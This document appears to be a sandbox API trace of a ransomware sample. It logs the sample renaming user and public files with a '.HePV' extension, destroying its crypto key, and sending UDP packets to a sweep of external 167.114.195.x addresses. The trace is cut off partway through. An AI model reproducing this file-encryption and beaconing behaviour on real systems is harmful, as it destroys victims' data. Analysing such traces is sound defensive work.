[0052.403] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\zVtAqhAG4.png" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\zvtaqhag4.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\zVtAqhAG4.png.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\n4tfww8kaonp4lrsod\\zvtaqhag4.png.hepv")) returned 1 [0052.413] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\Fwwltk.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\fwwltk.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\Fwwltk.jpg.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\fwwltk.jpg.hepv")) returned 1 [0052.418] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\MWr3SQ-BGboazakHKvR.png" (normalized: "c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\mwr3sq-bgboazakhkvr.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\MWr3SQ-BGboazakHKvR.png.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\mwr3sq-bgboazakhkvr.png.hepv")) returned 1 [0052.422] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\twbKot Z-u88qG9Lw.png" (normalized: "c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\twbkot z-u88qg9lw.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\twbKot Z-u88qG9Lw.png.HePV" (normalized: "c:\\users\\eebsym5\\pictures\\wvfrz77skzkohq3\\twbkot z-u88qg9lw.png.hepv")) returned 1 [0052.433] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\saved games\\desktop.ini" (normalized: "c:\\users\\eebsym5\\saved games\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\saved games\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\saved games\\desktop.ini.hepv")) returned 1 [0052.442] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\searches\\desktop.ini" (normalized: "c:\\users\\eebsym5\\searches\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\searches\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\searches\\desktop.ini.hepv")) returned 1 [0052.454] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\3mLSDRlx0hC.swf" (normalized: "c:\\users\\eebsym5\\videos\\3mlsdrlx0hc.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\3mLSDRlx0hC.swf.HePV" (normalized: "c:\\users\\eebsym5\\videos\\3mlsdrlx0hc.swf.hepv")) returned 1 [0052.456] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\desktop.ini" (normalized: "c:\\users\\eebsym5\\videos\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\videos\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\videos\\desktop.ini.hepv")) returned 1 [0052.467] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\3snn.mp4" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\3snn.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\3snn.mp4.HePV" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\3snn.mp4.hepv")) returned 1 [0052.470] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\JYX8uxKaLTwB.swf" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\jyx8uxkaltwb.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\JYX8uxKaLTwB.swf.HePV" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\jyx8uxkaltwb.swf.hepv")) returned 1 [0052.475] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\u0oORfLT.swf" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\u0oorflt.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\u0oORfLT.swf.HePV" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\u0oorflt.swf.hepv")) returned 1 [0052.478] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\VFctuaULnkw_.mp4" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\vfctuaulnkw_.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\VFctuaULnkw_.mp4.HePV" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\g3pr-uto decboym\\vfctuaulnkw_.mp4.hepv")) returned 1 [0052.485] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\kpdp\\um5e_wD.swf" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\um5e_wd.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\kpdp\\um5e_wD.swf.HePV" (normalized: "c:\\users\\eebsym5\\videos\\kpdp\\um5e_wd.swf.hepv")) returned 1 [0052.496] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\0jTAPsyhgixj.swf" (normalized: "c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\0jtapsyhgixj.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\0jTAPsyhgixj.swf.HePV" (normalized: "c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\0jtapsyhgixj.swf.hepv")) returned 1 [0052.504] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\0xkITdG.mp4" (normalized: "c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\0xkitdg.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\0xkITdG.mp4.HePV" (normalized: "c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\0xkitdg.mp4.hepv")) returned 1 [0052.518] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\cQH_kvgVjboYMCIGTI.swf" (normalized: "c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\cqh_kvgvjboymcigti.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\cQH_kvgVjboYMCIGTI.swf.HePV" (normalized: "c:\\users\\eebsym5\\videos\\lqvw5f5nm7pq\\cqh_kvgvjboymcigti.swf.hepv")) returned 1 [0052.534] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\lV-pCW0um6.mp4" (normalized: "c:\\users\\eebsym5\\videos\\lv-pcw0um6.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\lV-pCW0um6.mp4.HePV" (normalized: "c:\\users\\eebsym5\\videos\\lv-pcw0um6.mp4.hepv")) returned 1 [0052.558] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\W55Wd E8.mp4" (normalized: "c:\\users\\eebsym5\\videos\\w55wd e8.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\W55Wd E8.mp4.HePV" (normalized: "c:\\users\\eebsym5\\videos\\w55wd e8.mp4.hepv")) returned 1 [0052.560] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\YZSTFFCEJAavb.mp4" (normalized: "c:\\users\\eebsym5\\videos\\yzstffcejaavb.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\YZSTFFCEJAavb.mp4.HePV" (normalized: "c:\\users\\eebsym5\\videos\\yzstffcejaavb.mp4.hepv")) returned 1 [0052.565] MoveFileW (lpExistingFileName="c:\\users\\public\\desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="c:\\users\\public\\desktop\\desktop.ini.HePV" (normalized: "c:\\users\\public\\desktop\\desktop.ini.hepv")) returned 1 [0052.581] MoveFileW (lpExistingFileName="c:\\users\\public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="c:\\users\\public\\desktop.ini.HePV" (normalized: "c:\\users\\public\\desktop.ini.hepv")) returned 1 [0052.605] MoveFileW (lpExistingFileName="c:\\users\\public\\documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="c:\\users\\public\\documents\\desktop.ini.HePV" (normalized: "c:\\users\\public\\documents\\desktop.ini.hepv")) returned 1 [0052.628] MoveFileW (lpExistingFileName="c:\\users\\public\\downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), lpNewFileName="c:\\users\\public\\downloads\\desktop.ini.HePV" (normalized: "c:\\users\\public\\downloads\\desktop.ini.hepv")) returned 1 [0052.990] MoveFileW (lpExistingFileName="c:\\users\\public\\libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), lpNewFileName="c:\\users\\public\\libraries\\desktop.ini.HePV" (normalized: "c:\\users\\public\\libraries\\desktop.ini.hepv")) returned 1 [0053.002] MoveFileW (lpExistingFileName="c:\\users\\public\\music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), lpNewFileName="c:\\users\\public\\music\\desktop.ini.HePV" (normalized: "c:\\users\\public\\music\\desktop.ini.hepv")) returned 1 [0053.214] MoveFileW (lpExistingFileName="c:\\users\\public\\music\\sample music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), lpNewFileName="c:\\users\\public\\music\\sample music\\desktop.ini.HePV" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.hepv")) returned 1 [0053.293] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="c:\\users\\public\\pictures\\desktop.ini.HePV" (normalized: "c:\\users\\public\\pictures\\desktop.ini.hepv")) returned 1 [0053.553] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Chrysanthemum.jpg.HePV" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.hepv")) returned 1 [0053.655] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Desert.jpg.HePV" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.hepv")) returned 1 [0053.963] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\desktop.ini.HePV" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.hepv")) returned 1 [0054.389] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Hydrangeas.jpg.HePV" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.hepv")) returned 1 [0054.511] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Jellyfish.jpg.HePV" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.hepv")) returned 1 [0054.650] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Koala.jpg.HePV" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.hepv")) returned 1 [0054.730] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Lighthouse.jpg.HePV" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.hepv")) returned 1 [0054.902] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Penguins.jpg.HePV" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.hepv")) returned 1 [0054.994] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Tulips.jpg.HePV" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.hepv")) returned 1 [0055.187] MoveFileW (lpExistingFileName="c:\\users\\public\\recorded tv\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), lpNewFileName="c:\\users\\public\\recorded tv\\desktop.ini.HePV" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.hepv")) returned 1 [0055.198] MoveFileW (lpExistingFileName="c:\\users\\public\\recorded tv\\sample media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), lpNewFileName="c:\\users\\public\\recorded tv\\sample media\\desktop.ini.HePV" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.hepv")) returned 1 [0055.206] MoveFileW (lpExistingFileName="c:\\users\\public\\videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="c:\\users\\public\\videos\\desktop.ini.HePV" (normalized: "c:\\users\\public\\videos\\desktop.ini.hepv")) returned 1 [0055.220] MoveFileW (lpExistingFileName="c:\\users\\public\\videos\\sample videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), lpNewFileName="c:\\users\\public\\videos\\sample videos\\desktop.ini.HePV" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.hepv")) returned 1 [0058.866] MoveFileW (lpExistingFileName="c:\\users\\public\\videos\\sample videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="c:\\users\\public\\videos\\sample videos\\Wildlife.wmv.HePV" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.hepv")) returned 1 [0058.867] CryptDestroyKey (hKey=0x29ff10) returned 1 [0058.867] CryptReleaseContext (hProv=0x28f088, dwFlags=0x0) returned 1 [0096.122] GetExitCodeThread (in: hThread=0xc0, lpExitCode=0x12f180 | out: lpExitCode=0x12f180) returned 1 [0096.122] CloseHandle (hObject=0xc0) returned 1 [0096.122] GetCurrentThreadId () returned 0xa48 [0096.122] GetCurrentThreadId () returned 0xa48 [0096.122] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x12eda0 | out: lpWSAData=0x12eda0) returned 0 [0096.125] socket (af=2, type=2, protocol=0) returned 0xc0 [0096.126] htons (hostshort=0x1af5) returned 0xf51a [0096.126] inet_addr (cp="167.114.194.225") returned 0xe1c272a7 [0096.126] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.225"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.127] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.226"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.127] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.227"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.127] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.228"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.127] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.229"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.127] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.230"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.127] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.231"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.128] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.232"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.128] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.233"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.128] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.234"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.128] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.235"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.128] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.236"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.128] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.237"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.128] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.238"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.129] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.239"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.129] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.240"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.129] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.241"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.129] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.242"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.129] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.243"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.129] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.244"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.129] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.245"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.130] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.246"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.130] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.247"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.130] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.248"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.130] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.249"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.130] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.250"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.130] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.251"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.130] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.252"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.130] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.253"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.131] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.254"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.131] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.1"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.131] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.2"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.131] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.3"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.131] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.4"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.131] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.5"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.131] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.6"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.132] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.7"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.132] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.8"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.132] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.9"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.132] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.10"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.132] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.11"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.132] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.12"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.132] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.13"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.132] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.14"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.133] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.15"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.133] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.16"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.133] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.17"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.133] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.18"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.133] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.19"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.133] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.20"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.133] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.21"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.134] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.22"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.134] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.23"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.134] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.24"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.134] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.25"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.134] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.26"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.134] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.27"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.134] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.28"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.135] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.29"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.135] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.30"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.135] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.31"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.135] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.32"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.135] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.33"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.135] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, to=0x12ef34*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.34"), tolen=16 | out: buf=0x2829a8*) returned 53 [0096.135] sendto (in: s=0xc0, buf=0x2829a8*, len=53, flags=0, 